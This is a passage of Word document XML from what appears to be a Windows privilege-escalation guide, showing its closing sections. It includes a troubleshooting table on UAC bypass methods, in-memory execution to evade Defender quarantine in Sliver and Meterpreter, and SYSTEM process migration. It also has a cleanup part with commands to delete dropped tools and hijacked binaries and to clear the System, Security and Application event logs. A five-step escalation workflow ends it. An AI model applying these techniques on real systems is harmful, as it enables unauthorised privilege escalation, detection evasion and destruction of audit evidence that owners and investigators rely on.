        <w:t>| UAC module fails                  | Try a different bypass method (e.g., fodhelper -&gt; sdclt).               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A633F3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>| Shell commands not working        | Use 'execute' or 'execute-assembly' with full paths.                    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D23D921" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>| PowerShell is blocked             | Use C# assemblies (SharpUp, Seatbelt) or `execute` with cmd.exe.        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D9762" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>| Service cannot be started/stopped | Schedule a reboot or wait for restart.                                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B586FD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>| Kernel exploit causes BSOD        | Do not use kernel exploits except as absolute last resort.              |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0908391B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>| Filesystem is read-only           | Check if you have write privileges; try temporary directories like C:\Users\Public. |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B838632" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>| Defenders quarantines tools       | Use memory-only options (execute-assembly in Sliver, meterpreter in-memory execution). |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBFFE47" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>| Session drops after migration     | Migrate only to winlogon.exe or services.exe – not lsass.exe if it's protected. |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238AB762" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="1BA9F4AC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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621C1FF2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>PART 8: CLEANUP – PROFESSIONAL ENDING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C02649C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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32DAA72A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="094BBEB8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Remove all evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E03EC2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    rm C:\\Users\\Public\\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD46EDE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    rm C:\\Users\\Public\\SharpUp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE250B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    rm C:\\Users\\Public\\scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD01481" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    rm C:\\Users\\Public\\*.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF55EE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    rm C:\\Program.exe   (or the hijacked binary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8066BA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="77F1AA2F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If you replaced a legitimate service binary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1ACB42" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    – Upload the original backup (you should have downloaded it first).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F451F5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    – Restore permissions to original state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8F992" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="348B4083" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Clear event logs (if you don't care about stealth):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D36BFB3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    wevtutil cl System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18651544" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    wevtutil cl Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED8001" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    wevtutil cl Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54B04E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2DFC899D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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4C380761" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>CONCLUSION – THE "FULL" WORKFLOW IN 5 STEPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7FE8AF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>───────────────────────────────────────────────────────────────────────────────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720E503F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2A297673" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>1. ENUMERATE: Run PowerUp + Seatbelt + manual checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B1F378" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>2. PRIORITIZE: Look for AlwaysInstallElevated → Unquoted → Writable Service → Potato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD60655" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>3. EXPLOIT: Use the native command for your C2 (getsystem/elevate) or manually run the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BDA626" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4. STABILIZE: Confirm SYSTEM, migrate to a stable process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9BCD47" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>5. CLEAN UP: Remove tools, restore files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F15F4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6A9A008A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Speed Benchmark: With experience, this entire chain takes 3–5 minutes on a misconfigured system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3113923D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="56DDFB69" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006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1D02CF67" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">                           END OF FULL GUIDE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A06A87E" w14:textId="0FDB573F" w:rsidR="00CB6E71" w:rsidRDefault="002D006A"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═══════════════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CB6E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9F8"/>
    <w:rsid w:val="002D006A"/>
    <w:rsid w:val="008319F8"/>
    <w:rsid w:val="009B34C2"/>
    <w:rsid w:val="00CA5578"/>
    <w:rsid w:val="00CB6E71"/>
    <w:rsid w:val="00D85518"/>
    <w:rsid w:val="00FA4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B77E17"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{66886C27-19D3-9146-A27C-49030A793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4120</Words>
  <Characters>23484</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>195</Lines>
  <Paragraphs>55</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>27549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Niaz Afridi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Umar Niaz Afridi</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-30T14:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-30T14:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>